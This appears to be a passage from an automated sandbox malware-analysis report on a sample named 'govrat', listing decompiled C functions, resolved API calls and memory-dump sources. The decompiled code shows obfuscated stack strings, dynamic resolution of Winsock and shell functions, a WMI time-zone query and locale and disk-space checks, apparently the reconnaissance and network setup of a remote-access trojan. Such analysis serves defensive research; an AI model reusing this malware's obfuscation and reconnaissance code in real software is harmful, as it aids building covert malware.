    				 *((short*)(_t889 - 0x3d4)) = 0xc6;
    				 *((short*)(_t889 - 0x3d6)) = 0x82;
    				 *((short*)(_t889 - 0x3d8)) = 0x94;
    				 *((short*)(_t889 - 0x3da)) = 0x87;
    				 *((short*)(_t889 - 0x3dc)) = 0xae;
    				 *((short*)(_t889 - 0x3de)) = 0xec;
    				 *((short*)(_t889 - 0x3e0)) = 0xcf;
    				 *((short*)(_t889 - 0x3e2)) = 0x82;
    				 *((short*)(_t889 - 0x3e4)) = 0x83;
    				 *((short*)(_t889 - 0x3e6)) = 0xdb;
    				 *((short*)(_t889 - 0x3e8)) = 0x93;
    				 *((short*)(_t889 - 0x3ea)) = 0xc6;
    				 *((short*)(_t889 - 0x3ec)) = 0xc3;
    				 *((short*)(_t889 - 0x3ee)) = 0xc3;
    				 *((short*)(_t889 - 0x3f0)) = 0x93;
    				 *((short*)(_t889 - 0x3f2)) = 0xc3;
    				 *((short*)(_t889 - 0x3f4)) = 0xce;
    				 *((short*)(_t889 - 0x3f6)) = 0xc6;
    				 *((short*)(_t889 - 0x3f8)) = 0x8a;
    				 *((short*)(_t889 - 0x3fa)) = 0x87;
    				 *((short*)(_t889 - 0x3fc)) = 0x92;
    				 *((short*)(_t889 - 0x3fe)) = 0x89;
    				 *((short*)(_t889 - 0x400)) = 0x92;
    				 *((short*)(_t889 - 0x402)) = 0xc6;
    				 *((short*)(_t889 - 0x404)) = 0xa4;
    				 *((short*)(_t889 - 0x406)) = 0xab;
    				 *((short*)(_t889 - 0x408)) = 0x82;
    				 *((short*)(_t889 - 0x40a)) = 0xc3;
    				 *((short*)(_t889 - 0x40c)) = 0xc6;
    				 *((short*)(_t889 - 0x40e)) = 0x83;
    				 *((short*)(_t889 - 0x410)) = 0x83;
    				 *((short*)(_t889 - 0x412)) = 0x94;
    				 *((short*)(_t889 - 0x414)) = 0x80;
    				 *((short*)(_t889 - 0x416)) = 0xc6;
    				 *((short*)(_t889 - 0x418)) = 0xa4;
    				 *((short*)(_t889 - 0x41a)) = 0xab;
    				 *((short*)(_t889 - 0x41c)) = 0x82;
    				 *((short*)(_t889 - 0x41e)) = 0xc3;
    				 *((short*)(_t889 - 0x420)) = 0xc6;
    				 *((short*)(_t889 - 0x422)) = 0xdc;
    				 *((short*)(_t889 - 0x424)) = 0xab;
    				 *((short*)(_t889 - 0x426)) = 0xa7;
    				 *((short*)(_t889 - 0x428)) = 0xb4;
    				 *((short*)(_t889 - 0x42a)) = 0xec;
    				 *((short*)(_t889 - 0x42c)) = 0x95;
    				 *((short*)(_t889 - 0x42e)) = 0xc3;
    				 *((short*)(_t889 - 0x430)) = 0xc6;
    				 *((short*)(_t889 - 0x432)) = 0xdc;
    				 *((short*)(_t889 - 0x434)) = 0x83;
    				 *((short*)(_t889 - 0x44e)) = 0x95;
    				 *((short*)(_t889 - 0x436)) = 0x94;
    				 *((short*)(_t889 - 0x450)) = 0xc3;
    				 *((short*)(_t889 - 0x438)) = 0x93;
    				 *((short*)(_t889 - 0x440)) = 0x92;
    				 *((short*)(_t889 - 0x452)) = 0xc6;
    				 *((short*)(_t889 - 0x442)) = 0x8f;
    				 *((short*)(_t889 - 0x45c)) = 0xb3;
    				 *((short*)(_t889 - 0x444)) = 0x8e;
    				 *((short*)(_t889 - 0x45e)) = 0xb6;
    				 *((short*)(_t889 - 0x446)) = 0x85;
    				 *((short*)(_t889 - 0x460)) = 0xa5;
    				_t520 =  *(_t889 - 0x18);
    				 *((short*)(_t889 - 0x448)) = 0x94;
    				 *((short*)(_t889 - 0x43a)) = 0x92;
    				 *((intOrPtr*)(_t889 - 0x43e)) = 0x850083;
    				 *((intOrPtr*)(_t889 - 0x44c)) = 0xa700ec;
    				 *((intOrPtr*)(_t889 - 0x456)) = 0x8200c3;
    				 *((intOrPtr*)(_t889 - 0x45a)) = 0xc600dc;
    				 *((char*)(_t889 - 0x256)) = 0;
    				_t879 = 0x9706d0;
    				 *(_t889 - 0xa4) = _t520;
    				if(_t520 == 0) {
    					 *(_t889 - 0xa4) = 0x9706d0;
    				}
    				_t521 =  *(_t889 - 0x9c);
    				 *(_t889 - 0xa8) = _t521;
    				if(_t521 == 0) {
    					 *(_t889 - 0xa8) = _t879;
    				}
    				_t886 =  *(_t889 - 4);
    				_t522 = _t886[0x288];
    				if(_t522 == 0) {
    					_t523 = _t889 - 0x128;
    					goto L36;
    				} else {
    					if(_t522 != 1) {
    						_t523 = _t889 - 0x114;
    						L36:
    						 *(_t889 - 4) = _t523;
    					} else {
    						 *(_t889 - 4) = _t879;
    					}
    				}
    				_t524 =  &(_t886[0x208]);
    				_t821 =  *_t524 & 0x0000ffff;
    				 *(_t889 - 0xa0) = 0x9706d4;
    				if(_t821 != 0) {
    					 *(_t889 - 0x94) = _t524;
    				} else {
    					 *(_t889 - 0xa0) = _t879;
    					 *(_t889 - 0x94) = _t879;
    				}
    				 *(_t889 - 0x84) = 0x9706d8;
    				if(_t821 == 0) {
    					 *(_t889 - 0x84) = _t879;
    				}
    				_t525 =  *((intOrPtr*)(_t889 - 8));
    				if(_t525 == 0) {
    					_t525 = L0095102D(_t889 - 0x100);
    				}
    				_t822 =  &(_t886[0x188]);
    				_t849 =  *_t822 & 0x0000ffff;
    				 *(_t889 - 0x8c) = 0x9706d4;
    				if(_t849 != 0) {
    					 *(_t889 - 0x98) = _t822;
    				} else {
    					 *(_t889 - 0x8c) = _t879;
    					 *(_t889 - 0x98) = _t879;
    				}
    				 *(_t889 - 0x88) = 0x9706d8;
    				if(_t849 == 0) {
    					 *(_t889 - 0x88) = _t879;
    				}
    				_t823 = _t889 - 0xbc;
    				if( *((intOrPtr*)(_t889 - 0x90)) == 0) {
    					_t823 = _t889 - 0xd0;
    				}
    				_t850 = _t886[0xc8] & 0x0000ffff;
    				 *((intOrPtr*)(_t889 - 0x80)) = _t823;
    				 *(_t889 - 0x30) = 0x9706d4;
    				if(_t850 != 0) {
    					_t773 =  &(_t886[0xc8]);
    				} else {
    					 *(_t889 - 0x30) = _t879;
    					_t773 = _t879;
    				}
    				if(_t850 != 0) {
    					_t879 = 0x9706d8;
    				}
    				_t851 = _t889 - 0xbc;
    				if( *((intOrPtr*)(_t889 - 0x90)) == 0) {
    					_t851 = _t889 - 0xd0;
    				}
    				_push( *(_t889 - 0xa4));
    				_push( *(_t889 - 0xa8));
    				_push( &(_t886[0x248]));
    				_push( *(_t889 - 4));
    				_push( *(_t889 - 0xa0));
    				_push( *(_t889 - 0x94));
    				_push( *(_t889 - 0x84));
    				_push( &(_t886[0x1c8]));
    				_push(_t525);
    				_push( &(_t886[0x29c]));
    				_push( &(_t886[0x28c]));
    				_push( &(_t886[0x108]));
    				_push( *(_t889 - 0x8c));
    				_push( *(_t889 - 0x98));
    				_push( *(_t889 - 0x88));
    				_push( &(_t886[0x148]));
    				_push( *((intOrPtr*)(_t889 - 0x80)));
    				_push( *(_t889 - 0x30));
    				_push(_t773);
    				_push(_t879);
    				_push( &(_t886[0x88]));
    				_push(_t886[0x2ac]);
    				_push(_t886[0x2ae]);
    				_push(_t886[0x86]);
    				_push(_t886[0x82]);
    				_push(_t886[0x84]);
    				_push(_t851);
    				_push(_t886);
    				_t532 = E00951048(_t889 - 0x460);
    				_t880 =  *((intOrPtr*)(_t889 - 0x470));
    				L00951000( *((intOrPtr*)(_t889 - 0x464)), _t532, _t886[0x80]);
    				_t535 = E00951195(_t851, _t880, _t886, 8);
    				_t826 = _t880;
    				 *0x975978 = _t535;
    				 *((intOrPtr*)(_t535 + 4)) = _t880;
    				_t852 = _t826 + 2;
    				do {
    					_t881 =  *_t826;
    					_t826 = _t826 + 2;
    				} while (_t881 != 0);
    				_t828 = _t826 - _t852 >> 1;
    				_t829 = _t828 + _t828 + 2;
    				 *_t535 = _t828 + _t828 + 2;
    				if( *((intOrPtr*)(_t889 - 0x10)) != 0) {
    					_t540 =  *((intOrPtr*)(_t889 - 0xc));
    					if(_t540 != 0) {
    						_t829 =  *_t540;
    						 *((intOrPtr*)( *_t540 + 8))(_t540);
    					}
    					_t541 =  *((intOrPtr*)(_t889 - 0x14));
    					if(_t541 != 0) {
    						_t829 =  *_t541;
    						 *((intOrPtr*)( *_t541 + 8))(_t541);
    					}
    				}
    				if( *((intOrPtr*)(_t889 - 8)) != 0) {
    					E0095115B(_t829, _t852, _t886,  *((intOrPtr*)(_t889 - 8)));
    					_pop(_t829);
    				}
    				E0095115B(_t829, _t852, _t886,  *(_t889 - 0x9c));
    				_pop(_t830);
    				E0095115B(_t830, _t852, _t886,  *(_t889 - 0x18));
    				_pop(_t831);
    				_t538 = E0095115B(_t831, _t852, _t886, _t886);
    				return _t538;
    			}

    APIs
    • GetProcAddress.KERNEL32 ref: 009641C4
    • GetDiskFreeSpaceExW.KERNELBASE(?,?,?,00000000), ref: 009641DC
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 18 965f07-965f0e 19 965f14-965fe1 GetProcAddress * 6 18->19 20 965ffb 18->20 19->20 22 965fe3-965fe6 19->22 21 965ffd-965fff 20->21 22->20 23 965fe8-965feb 22->23 23->20 24 965fed-965ff0 23->24 24->20 25 965ff2-965ff4 24->25 25->20 26 965ff6-965ff9 25->26 26->21
    C-Code - Quality: 100%
    			E00965F07(struct HINSTANCE__* __eax, _Unknown_base(*)()** __edi) {
    				void* _t42;
    				_Unknown_base(*)()* _t43;
    				_Unknown_base(*)()* _t45;
    				_Unknown_base(*)()* _t47;
    				_Unknown_base(*)()* _t49;
    				_Unknown_base(*)()* _t51;
    				_Unknown_base(*)()* _t53;
    				void* _t62;
    
    				 *(_t62 - 4) = __eax;
    				if(__eax == 0) {
    					L7:
    					_t42 = 0;
    				} else {
    					 *(_t62 - 0x30) = 0x53415357;
    					 *((intOrPtr*)(_t62 - 0x2c)) = 0x74726174;
    					 *((short*)(_t62 - 0x28)) = 0x7075;
    					 *((char*)(_t62 - 0x26)) = 0;
    					_t43 = GetProcAddress(__eax, _t62 - 0x30); // executed
    					 *__edi = _t43;
    					 *(_t62 - 0x3c) = 0x43415357;
    					 *((intOrPtr*)(_t62 - 0x38)) = 0x6e61656c;
    					 *((short*)(_t62 - 0x34)) = 0x7075;
    					 *((char*)(_t62 - 0x32)) = 0;
    					_t45 = GetProcAddress( *(_t62 - 4), _t62 - 0x3c); // executed
    					 *(__edi + 4) = _t45;
    					 *(_t62 - 0x18) = 0x74656e69;
    					 *((intOrPtr*)(_t62 - 0x14)) = 0x6464615f;
    					 *((short*)(_t62 - 0x10)) = 0x72;
    					_t47 = GetProcAddress( *(_t62 - 4), _t62 - 0x18); // executed
    					 *(__edi + 8) = _t47;
    					 *(_t62 - 0x4c) = 0x68746567;
    					 *((intOrPtr*)(_t62 - 0x48)) = 0x6274736f;
    					 *((intOrPtr*)(_t62 - 0x44)) = 0x6d616e79;
    					 *((short*)(_t62 - 0x40)) = 0x65;
    					_t49 = GetProcAddress( *(_t62 - 4), _t62 - 0x4c); // executed
    					 *(__edi + 0xc) = _t49;
    					 *(_t62 - 0x24) = 0x74656e69;
    					 *((intOrPtr*)(_t62 - 0x20)) = 0x6f746e5f;
    					 *((short*)(_t62 - 0x1c)) = 0x61;
    					_t51 = GetProcAddress( *(_t62 - 4), _t62 - 0x24); // executed
    					 *(__edi + 0x10) = _t51;
    					 *(_t62 - 0xc) = 0x686f746e;
    					 *((short*)(_t62 - 8)) = 0x6c;
    					_t53 = GetProcAddress( *(_t62 - 4), _t62 - 0xc); // executed
    					 *(__edi + 0x14) = _t53;
    					if( *__edi == 0 ||  *(__edi + 8) == 0 ||  *(__edi + 0xc) == 0 ||  *(__edi + 0x10) == 0 || _t53 == 0) {
    						goto L7;
    					} else {
    						_t42 = 1;
    					}
    				}
    				return _t42;
    			}

    APIs
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00965F37
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00965F59
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00965F79
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?), ref: 00965FA0
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00965FC0
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00965FD9
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    C-Code - Quality: 94%
    			E00965A5F(_Unknown_base(*)()** __esi) {
    				struct HINSTANCE__* _v8;
    				short _v10;
    				short _v12;
    				short _v14;
    				short _v16;
    				short _v18;
    				short _v20;
    				short _v22;
    				char _v24;
    				short _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v46;
    				short _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				char _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				char _v88;
    				short _t36;
    				short _t37;
    				short _t38;
    				short _t39;
    				short _t40;
    				short _t41;
    				struct HINSTANCE__* _t44;
    				_Unknown_base(*)()* _t46;
    				_Unknown_base(*)()* _t48;
    				_Unknown_base(*)()* _t50;
    
    				_t36 = 0x53;
    				_v24 = _t36;
    				_t37 = 0x48;
    				_v22 = _t37;
    				_t38 = 0x45;
    				_v20 = _t38;
    				_t39 = 0x4c;
    				_v18 = _t39;
    				_v16 = _t39;
    				_t40 = 0x33;
    				_v14 = _t40;
    				_t41 = 0x32;
    				_v12 = _t41;
    				_v10 = 0;
    				_push( &_v24);
    				_t44 = L009BFBD9( &_v24);
    				_v8 = _t44;
    				if(_t44 == 0) {
    					L5:
    					return 0;
    				}
    				_push(_t55);
    				_v44 = 0x72434853;
    				_v40 = 0x65746165;
    				_v36 = 0x6c656853;
    				_v32 = 0x6574496c;
    				_v28 = 0x6d;
    				_t46 = GetProcAddress(_t44,  &_v44); // executed
    				 *__esi = _t46;
    				_v64 = 0x61504853;
    				_v60 = 0x44657372;
    				_v56 = 0x6c707369;
    				_v52 = 0x614e7961;
    				_v48 = 0x656d;
    				_v46 = 0;
    				_t48 = GetProcAddress(_v8,  &_v64); // executed
    				 *(__esi + 4) = _t48;
    				_v88 = 0x65474853;
    				_v84 = 0x65705374;
    				_v80 = 0x6c616963;
    				_v76 = 0x646c6f46;
    				_v72 = 0x61507265;
    				_v68 = 0x576874;
    				_t50 = GetProcAddress(_v8,  &_v88); // executed
    				 *(__esi + 8) = _t50;
    				if( *__esi == 0 ||  *(__esi + 4) == 0 || _t50 == 0) {
    					goto L5;
    				} else {
    					return 1;
    				}
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,?,00974D08), ref: 00965ADF
    • GetProcAddress.KERNEL32(00960300,?), ref: 00965B0F
    • GetProcAddress.KERNEL32(00960300,?), ref: 00965B45
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    C-Code - Quality: 71%
    			E00963E83(struct HINSTANCE__* __eax, char __ebx, void* __edx, intOrPtr __edi, intOrPtr* __esi) {
    				_Unknown_base(*)()* _t96;
    				CHAR* _t98;
    				_Unknown_base(*)()* _t100;
    				short _t102;
    				short _t104;
    				short* _t105;
    				short _t106;
    				short _t110;
    				short _t111;
    				short _t112;
    				short _t113;
    				short _t114;
    				short _t115;
    				short _t116;
    				short _t117;
    				short _t118;
    				short _t119;
    				short _t120;
    				short _t121;
    				short _t122;
    				short _t123;
    				short _t124;
    				short _t126;
    				short _t127;
    				short _t128;
    				short _t129;
    				short _t130;
    				short _t132;
    				short _t134;
    				short _t135;
    				short _t136;
    				signed int _t139;
    				short _t142;
    				short _t144;
    				short _t145;
    				short _t146;
    				short _t148;
    				short _t149;
    				short _t150;
    				short _t151;
    				void* _t156;
    				void* _t157;
    				void* _t160;
    				char _t169;
    				void* _t174;
    				short _t176;
    				intOrPtr* _t178;
    				short* _t179;
    				void* _t180;
    
    				_t178 = __esi;
    				_t175 = __edi;
    				_t174 = __edx;
    				_t169 = __ebx;
    				_t96 = GetProcAddress(__eax, ??); // executed
    				if(_t96 == 0) {
    					L3:
    					_t98 = _t180 - 0x3c;
    					 *((char*)(_t180 - 0x58)) = 0x47;
    					 *((char*)(_t180 - 0x57)) = _t169;
    					 *((intOrPtr*)(_t180 - 0x56)) = 0x636f4c74;
    					 *((short*)(_t180 - 0x52)) = 0x6c61;
    					 *((char*)(_t180 - 0x50)) = _t169;
    					 *((intOrPtr*)(_t180 - 0x4f)) = 0x6f666e49;
    					 *((short*)(_t180 - 0x4b)) = 0x57;
    					_t100 = GetProcAddress(L00A0C36C(), _t98); // executed
    					 *(_t180 - 8) = _t100;
    					_t102 =  *(_t180 - 8)(0x400, 0x59, _t175 + 0x518, 0x10, _t98, _t180 - 0x58);
    					if(_t102 == 0) {
    						 *((short*)(_t175 + 0x518)) = _t102;
    					}
    					_t104 =  *(_t180 - 8)(0x400, 0x5a, _t175 + 0x538, 0x10);
    					if(_t104 == 0) {
    						 *((short*)(_t175 + 0x538)) = _t104;
    					}
    					 *(_t180 - 8) =  *(_t180 - 8) & 0x00000000;
    					if( *((intOrPtr*)(_t180 - 0x10)) != 0) {
    						_t110 = 0x53;
    						 *((short*)(_t180 - 0x214)) = _t110;
    						_t111 = 0x45;
    						 *((short*)(_t180 - 0x212)) = _t111;
    						_t112 = 0x4c;
    						 *((short*)(_t180 - 0x210)) = _t112;
    						_t113 = 0x45;
    						 *((short*)(_t180 - 0x20e)) = _t113;
    						_t114 = 0x43;
    						 *((short*)(_t180 - 0x20c)) = _t114;
    						_t115 = 0x54;
    						 *((short*)(_t180 - 0x20a)) = _t115;
    						_t116 = 0x20;
    						 *((short*)(_t180 - 0x208)) = _t116;
    						_t117 = 0x2a;
    						 *((short*)(_t180 - 0x206)) = _t117;
    						_t118 = 0x20;
    						 *((short*)(_t180 - 0x204)) = _t118;
    						_t119 = 0x46;
    						 *((short*)(_t180 - 0x202)) = _t119;
    						_t120 = 0x52;
    						 *((short*)(_t180 - 0x200)) = _t120;
    						_t121 = 0x4f;
    						 *((short*)(_t180 - 0x1fe)) = _t121;
    						_t122 = 0x4d;
    						 *((short*)(_t180 - 0x1fc)) = _t122;
    						_t123 = 0x20;
    						 *((short*)(_t180 - 0x1fa)) = _t123;
    						_t124 = 0x57;
    						_t176 = 0x69;
    						 *((short*)(_t180 - 0x1f8)) = _t124;
    						 *((short*)(_t180 - 0x1f6)) = _t176;
    						_t126 = 0x6e;
    						 *((short*)(_t180 - 0x1f4)) = _t126;
    						_t127 = 0x33;
    						 *((short*)(_t180 - 0x1f2)) = _t127;
    						_t128 = 0x32;
    						 *((short*)(_t180 - 0x1f0)) = _t128;
    						_t129 = 0x5f;
    						 *((short*)(_t180 - 0x1ee)) = _t129;
    						_t130 = 0x54;
    						 *((short*)(_t180 - 0x1ec)) = _t130;
    						 *((short*)(_t180 - 0x1ea)) = _t176;
    						_t132 = 0x6d;
    						 *((short*)(_t180 - 0x1e8)) = _t132;
    						 *((short*)(_t180 - 0x1e6)) = _t169;
    						_t134 = 0x5a;
    						 *((short*)(_t180 - 0x1e4)) = _t134;
    						_t135 = 0x6f;
    						 *((short*)(_t180 - 0x1e2)) = _t135;
    						_t136 = 0x6e;
    						 *((short*)(_t180 - 0x1e0)) = _t136;
    						 *((short*)(_t180 - 0x1de)) = _t169;
    						 *((short*)(_t180 - 0x1dc)) = 0;
    						_t139 = E00951195(_t174, _t176, _t178, 0x2000); // executed
    						 *(_t180 - 8) = _t139;
    						 *_t178(_t180 - 0x28);
    						_t142 = 0x44;
    						 *((short*)(_t180 - 0x1b8)) = _t142;
    						 *((short*)(_t180 - 0x1b6)) = _t169;
    						_t144 = 0x73;
    						 *((short*)(_t180 - 0x1b4)) = _t144;
    						_t145 = 0x63;
    						 *((short*)(_t180 - 0x1b2)) = _t145;
    						_t146 = 0x72;
    						 *((short*)(_t180 - 0x1b0)) = _t146;
    						 *((short*)(_t180 - 0x1ae)) = _t176;
    						_t148 = 0x70;
    						 *((short*)(_t180 - 0x1ac)) = _t148;
    						_t149 = 0x74;
    						 *((short*)(_t180 - 0x1aa)) = _t149;
    						_t150 = 0x6f;
    						 *((short*)(_t180 - 0x1a6)) = _t150;
    						_t151 = 0x6e;
    						 *((short*)(_t180 - 0x1a4)) = _t151;
    						 *((short*)(_t180 - 0x1a2)) = 0;
    						 *((short*)(_t180 - 0x1a8)) = _t176;
    						_t156 = E0095D2FF(_t169,  *((intOrPtr*)(_t180 - 0xc)), _t178, _t180 - 0x214, _t180 - 0x1b8, _t180 - 0x28); // executed
    						if(_t156 != 0 &&  *((short*)(_t180 - 0x28)) == 8) {
    							L00951604( *(_t180 - 8), 0xfff,  *((intOrPtr*)(_t180 - 0x20)));
    						}
    						_t157 = _t180 - 0x28;
    						_push(_t157);
    						_push(_t157); // executed
    						L009E6735(); // executed
    						_t175 =  *((intOrPtr*)(_t180 - 4));
    					}
    					_t105 = E00951195(_t174, _t175, _t178, 0xfffe); // executed
    					_t179 = _t105;
    					_push(_t179);
    					_push(0x7ffe);
    					_push(_t105);
    					_t106 = L00A17B1C(_t105);
    					if(_t106 == 0) {
    						 *_t179 = _t106;
    					}
    					_push(_t180 - 0x7c);
    					_push(_t180 - 0x3c);
    					 *((char*)(_t180 - 0x7c)) = 0x47;
    					 *((char*)(_t180 - 0x7b)) = _t169;
    					 *((intOrPtr*)(_t180 - 0x7a)) = 0x73694474;
    					 *((short*)(_t180 - 0x76)) = 0x466b;
    					 *((char*)(_t180 - 0x74)) = 0x72;
    					 *((char*)(_t180 - 0x73)) = _t169;
    					 *((char*)(_t180 - 0x72)) = _t169;
    					 *((intOrPtr*)(_t180 - 0x71)) = 0x63617053;
    					 *((char*)(_t180 - 0x6d)) = _t169;
    					 *((intOrPtr*)(_t180 - 0x6c)) = 0x577845;
    					return L009BA5CA(_t180 - 0x3c);
    				} else {
    					_t160 =  *_t96(0, __edi + 0x390, 4, _t180 - 0x2c); // executed
    					if(_t160 != 0) {
    						goto L3;
    					} else {
    						 *((intOrPtr*)(__edi + 0x510)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0xc));
    						L00951667(__edi + 0x410, 0x40,  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x24)), 0xffffffff);
    						_push(_t180 - 0x30);
    						_push( *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x60)));
    						return L00A122E0( *((intOrPtr*)(_t180 - 0x2c)), __edi);
    					}
    				}
    			}

    APIs
    • GetProcAddress.KERNEL32 ref: 00963E84
    • GetProcAddress.KERNEL32(00000000,?), ref: 00963F25
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 00963F25
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph
